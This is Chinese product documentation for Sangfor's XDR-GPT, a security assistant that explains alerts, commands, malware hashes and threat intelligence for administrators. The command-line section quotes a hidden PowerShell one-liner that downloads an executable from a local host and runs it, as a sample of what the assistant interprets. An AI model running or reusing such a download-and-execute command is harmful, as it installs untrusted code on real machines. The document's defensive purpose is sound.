更新时间:2024-01-17
XDR-GPT概述
- 当前GPT技术正在塑造各行各业,深信服一直以来也非常重视技术创新和应用,为了积极拥抱技术变革,深信服一直以来积极研究并利用AI技术提升网络安全能力,以缩小与发达国家之间的网络安全产业差距。
- 近期深信服正在研发网络安全垂直领域的安全GPT,其定位是包含在深信服XDR产品(服务)中的一个安全智能助手,它采集来自用户侧的数十万台深信服安全设备上报的经过匿名化处理后的海量网络安全威胁数据,以及其他合法来源的网络安全百科知识等进行预训练,,日志、攻击威胁流量、安全事件与告警日志,以及其他合法来源的海量安全百科知识和其他IT语料库来进行预训练,最后经过深信服安全专家的模型微调和强化训练后,得到网络安全垂直领域的GPT模型,可以实现多种网络安全任务,网络安全管理人员可以通过自然语言与安全GPT交互,协助管理员完成包括流量研判、事件解析、日志关联、安全建议生成、安全威胁检测等复杂的网络安全任务。
主打价值
- 通过GPT辅助驾驶全面赋能安全运营的全生命周期(资产漏洞治理、威胁检测发现、告警事件闭环、处置调查、总结汇报)的关键job,提升系统安全能力,将日常安全运营所花费的时间减少95%;
关键价值
1.消除繁琐、紧迫的运营工作,减少92%需要多次手动操作的job;
2.人员、流程和技术融合,降低系统安全运营维护程碑,提升系统安全能力;
原理描述
深信服大模型预训练和微调安全日志,事件或告警等语料库,泛化并归类生成流量研判,安全检测,事件解析等多种类型的任务。客户通过前端询问,大模型理解查询,并转换为批处理命令或查询语句,调用xdr,edr,云端情报库等数据源获取原始数,然后经过自然语言转换呈现给前端。下面以脆弱性漏洞解读流程图为例,说明辅助驾驶自然语言处理原理:
关键指标
| 产品模块 |
依赖环境 |
能力 |
能力边界 |
注意事项 |
| GPT模块(辅助研判) |
XDR内部有资产的数据切已经配置的详细内容 |
资产查询和统计 |
支持查询内网当中的资产分布情况查询、查询特定IP地址的资产信息 |
|
| GPT与XDR联动正常 |
HTTP告警数据包解读 |
支持页面输入数据包内容、基于N侧的告警进入该功能;数据包解读会基于内容、输出该数据包是否为恶意,攻击手法的剖析,攻击特征的内容; |
|
| GPT与XDR联动正常、无异常,可联网 |
威胁情报解读 |
可以查询特定IP地址、URL的情报信息;可反馈对应的情报查询的结果、图文实现; |
|
| XDR内有资产存在漏洞的数据 |
漏洞预警、排查与闭环 |
统计特定漏洞在内网当中的资产分布情况、比如哪些主机存在log4j的漏洞 |
|
| 告警数据不为空 |
安全告警统计筛选 |
可以从告警名称、攻击IP、资产IP、攻击方向、处置状态等维度进行告警的查询、统计; |
|
| GPT与XDR联动正常 |
安全事件的解读与查询 |
总结安全事件的概述,自然语言的方式完成告警的总结 |
|
| GPT与XDR联动正常 |
攻击IP调查 |
查询特定IP地址、攻击过内网哪些主机; |
|
GPT与XDR联动正常
平台告警数据不为空 |
特定时间内安全趋势的总结 |
能够总结一段时间内的安全趋势,包含资产变化、安全告警、安全事件,有图文并茂的呈现;
时间周期:最近1个月、半个月、最近7天的时间周期,时间跨度需要在半年内, |
|
| GPT与XDR联动正常、无异常,可联网 |
安全百科知识解读 |
支持查询基础的漏洞名称、特定的攻击手法、黑客工具、安全专有名称等内容;部分有歧义的通用名称、可能无法识别 |
|
| GPT与XDR联动正常 |
告警命令行解读 |
可以基于对话框输入命令行、基于IOA安全告警进入该功能;可以解读命令行的结果、可以基于结果进行能力的追问; |
|
| GPT与XDR联动正常、无异常,可联网 |
恶意文件解读 |
可以基于对话框输入命令行、基于IOA安全告警进入该功能;需要输入完整的md5,明确恶意的能够返回对应解读内容和恶意性;正常的文件、仅有结果无更多内容; |
|
产品形态
- 深信服安全GPT赋能深信服XDR产品,其定位是作为深信服XDR产品一个的安全智能助手(副驾驶),帮助用户的安全管理员更好地运维和使用网络安全产品,为企业级用户提供更高阶、更智能的安全能力及配套服务,并提升用户的整体使用体验。
- 深信服安全GPT作为深信服XDR服务的辅助安全工具,可以为企业级用户(企业的网络安全管理人员)提供包括安全专业名词百科、辅助漏洞风险排查、资产治理统计、攻击数据包内容解读、威胁情报查询、安全事件解读等安全功能。
核心功能清单
资产查询和统计
- 通过将XDR接入EDR、NDR的产品或与用户侧的CMDB系统对接,安全GPT可以实现以下功能,使资产管理更加便捷和高效。
- 安全GPT提供了对话框式的查询界面,让用户能够对现有网络内的资产进行多维度的统计和查询。您可以根据不同的字段和属性进行查询,例如特定开放的端口、资产的责任人、资产的类型、不同的区域等多个维度,以满足各种查询需求。安全GPT支持多种输出方式,包括MarkDown、表格和饼图。您可以根据需要选择适合的输出格式,以便更好地呈现查询结果。对于查询到的数据,安全GPT能够以自然语言的方式进行描述和总结,使您更容易理解和解读查询结果。这种自然语言描述功能有助于更深入地了解资产情况并做出相应的决策。
- 安全GPT使资产管理变得更加便捷和直观,帮助您更好地了解和掌握现有网络中的资产信息。无论是定位责任人还是进行多维度的统计和查询,安全GPT将为您提供强大的支持和便利。
告警解读
- 安全GPT提供了强大的功能,让用户能够更好地理解和解读安全告警。通过我们安全告警页面入口,用户可以轻松解读安全告警的内容,以自然语言的方式呈现。我们致力于提供清晰、简洁的解读,帮助用户准确理解告警的含义。
终端命令行解读
- 目前安全GPT支持对终端命令行的告警进行解读、辅助安全人员更好的看懂终端、EDR的安全告警;
powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\\ascotbe.exe');&cmd /c .\\ascotbe.exe
-
- 同时我们可以在XDR-安全告警中心、找到任意一条安全告警;点击查看进程点后,可以看到对应的命令行;该场景下也可以直接点击安全GPT进行解读;
恶意文件分析解读
- 目前安全GPT支持分析恶意文件、并支持虚拟执行并返回专家解读的效果;并支持将结果导出pdf文件;
- 比如可以进行提问:解读一下恶意文件a7452cbc08dc30a139eba09b1ae70b04
- 同时针对部分IOA安全告警、也可以支持相同的操作。比如在IOA告警侧、点击解读后,进行选择;
威胁情报解读
- 安全GPT产品提供了强大的功能,特别是在IOC情报类告警方面。我们的系统利用深入的安全知识和云端的情报分析能力,能够对威胁情报进行全面的分析提供了多个维度的分析结果,包括威胁情报的活跃程度、恶意性、网络信息、家族信息、活跃地区、入库时间、活跃行业和标签等。
- 安全GPT以自然语言+图片+链接的方式表达结果,提供清晰、丰富的描述,使用户能够轻松理解威胁情报的特征和属性,确保用户准确把握威胁情报的重要细节。
- 同时也可以在IOC类的安全告警当中进行解读、查询;比如打开一个IOC类、病毒类的安全告警;点击安全GPT的按钮,会自动触发告警解读的能力;
漏洞预警、排查与闭环
- 安全GPT功能清单包括以下特性,旨在提供全面的漏洞管理和修复支持。
- 通过自然语言方式,您可以查询特定漏洞的危害、原理等背景信息,帮助您做出决策。
- 结合XDR内的数据,安全GPT可以对全网的资产进行漏洞排查,并将存在特定漏洞的资产与相关字段关联起来,实现漏洞的梳理和资产管理的全面性。
- 您还可以排查与漏洞相关的安全告警,并进行统计分析。
- 对于特定漏洞,我们提供两个以上的修复方案,包括修复方法、修复补丁链接和缓解措施,帮助您选择适合您环境的修复策略。
- 安全GPT支持以表格和Markdown方式展示漏洞信息,让您根据需要灵活展示和共享数据。
安全告警统计筛选
- 安全GPT提供了以下功能,旨在提供便捷的告警查询、统计分析和相关数据的查看。用户可以通过对话框的方式查询特定时间范围内的告警,并进行统计分析。查询统计的维度包括安全告警名称、危害程度、主机IP、攻击类型、受害者IP、端+网、告警来源等字段,帮助用户全面了解告警情况和分析趋势。
- 安全GPT支持以Markdown表格等方式进行输出,便于用户展示查询结果。输出的表格包含告警ID,并支持点击,方便快速查看详细信息。用户还可以通过告警ID查询攻击数据包,查看攻击IP的情报信息,以及查询受害者资产的相关信息。这些功能使用户能够深入了解攻击事件,提供更全面的上下文和相关数据,以便做出决策和采取相应的行动。
- 安全GPT为您提供了便捷的告警查询和分析工具,帮助您全面了解网络安全状况,并及时采取措施应对潜在的威胁。无论是查询统计告警、输出表格形式的结果,还是查看攻击数据包和相关资产信息。
安全事件的解读与查询
- 用户可以在对话框中查询安全事件的列表,并根据事件的危害等级进行排查整理。这使用户能够快速获取关于安全事件的概览信息,并按照危害等级对事件进行有效分类和处理。通过安全事件页面的按钮或事件ID触发,用户可以进一步获取事件的详细解读。安全GPT以故事线和自然语言的方式进行讲述,帮助用户清晰地了解当前事件的来龙去脉。这种详细解读有助于用户深入了解事件的背景、原因和影响,为用户提供全面的上下文信息,以便更好地做出决策和采取相应的行动。
- 安全GPT为用户提供了方便的安全事件查询和详细解读工具。用户可以通过对话框查询事件列表并进行排查整理,同时通过故事线和自然语言的解读方式,深入了解事件的背景和细节。无论是获取事件概览信息还是详细解读,安全GPT将为用户提供强大的功能和便捷的使用体验。
HTTP检测能力增强
- 借助内置的安全GPT大模型,我们的产品具备以下强大功能,大幅提升了在HTTP场景下的安全检测能力:
- 基于对安全攻防知识的深入理解,安全GPT能够高效地检测并应对各类安全威胁。特别是在面对一些隐蔽攻击、高级威胁以及人参与的对抗类攻击时,我们的产品能够发挥出强大的检测能力。通过运用安全GPT大模型,我们的产品能够准确识别并防御潜在的安全威胁,为HTTP场景下的网络环境提供全方位的保护。无论是面对隐蔽攻击的挑战、应对高级威胁的威胁还是应对人参与的对抗类攻击;
攻击IP调查
- 安全GPT提供全面的攻击调查和威胁情报查询功能。用户可以通过支持以攻击者IP进行调查,查找攻击者IP曾经攻击过的内网其他资产,并关联对应资产的责任人、部门等信息。这有助于用户追溯攻击路径,识别受到攻击的资产,并与相关责任人建立联系,提高应对攻击事件的效率和准确性。同时,我们的产品支持以表格和Markdown的方式展示查询结果,方便用户根据需要选择合适的展示方式,便于查看和分享。此外,我们提供详细的攻击IP威胁情报信息,包括活跃程度、区域、标签、攻击意图、攻击时间、网络标签等,使用自然语言表达,并提供与行业标杆相媲美的效果样例。这使用户能够全面了解攻击IP的威胁特征,更好地评估和应对安全风险。通过我们的安全GPT产品,用户将获得全面的攻击调查和威胁情报查询工具,提升安全防御能力并提供卓越的使用体验。
特定时间内安全趋势的总结
- 我们的安全GPT产品提供了强大的功能,可以帮助用户统计一段时间内的安全趋势情况。借助我们深入掌握的安全知识和数据分析能力,我们能够支持告警、事件、资产等多维度数据的统计,包括总数、趋势变化以及新增数据。此外,我们的安全GPT能够对资产类型和告警类型进行详尽的分析,以提供全面的数据视角。
- 除了统计功能,我们的安全GPT还具备总结当前趋势变化情况的能力。通过综合分析和比对统计结果,我们能够准确总结当前安全态势的变化,帮助用户快速了解安全状况。
- 为了更好地展示查询结果数据,我们的安全GPT支持以柱状图和趋势图的形式进行可视化展示。这种直观明了的可视化方式,使用户能够直接观察和分析数据,更好地理解安全趋势的变化。我们致力于为用户提供高质量的安全GPT产品功能,助力用户深入了解安全态势,为决策提供有力支持。
安全百科知识解读
- 安全GPT产品具备丰富的安全知识,堪比多年经验的安全专家。无论是针对攻击手法、黑客工具名称,还是关于安全制度、安全标准、网络安全名词等方面的问题,我们的产品都能够提供准确而全面的答案。通过深度学习和自然语言处理技术,我们的安全GPT已经积累了大量的安全知识,能够以类比于经验丰富的安全专家的方式进行回答。用户可以依靠我们的产品获取及时的安全信息和专业的解答,进一步加强对安全领域的理解和提升应对能力。
- 例1:比如进行提问:什么是webshell上传攻击,请举例说明一下,以代码的方式举例?安全GPT会结合更多的安全知识、代码、描述等内容进行全方位的解读与分析;
- 例2:比如进行提问:什么是软件供应链攻击、有哪些具体发生过的案例
-
- 也可以继续进行追问,详细说明一下“SolarWinds”的软件供应链攻击事件?
易用性设计
多轮对话解读
- 大模型支持针对攻击成功、是否恶意、是否为误报的识别能力,支持多轮对话解读;支持对安全告警的解读内容进行追问、进行回答;
问题推荐
交互易用性
- 优化了安全GPT页面的展示、提升了交互的专业性和友善性
问题反馈系统
- 我们为用户提供了一个便捷的反馈机制。用户可以根据对答案的满意程度给予打分,并提供他们的改进意见。这个反馈机制对于我们不断提高大模型的性能和质量至关重要。通过这个功能,我们能够深入了解用户的需求和期望,从而优化我们的回答质量和用户体验。用户的反馈将被认真收集和分析,我们将不断努力改进和优化我们的大模型,以更好地满足用户的需求。
- 我们重视用户的意见和反馈,因此我们鼓励用户积极参与这个反馈过程。通过您的反馈,我们将能够提供更准确、更有帮助的回答,并不断进化以适应不断变化的用户需求。
- 我们期待您的参与和反馈,共同打造一个更加出色的产品体验。
建议使用Chrome浏览器访问!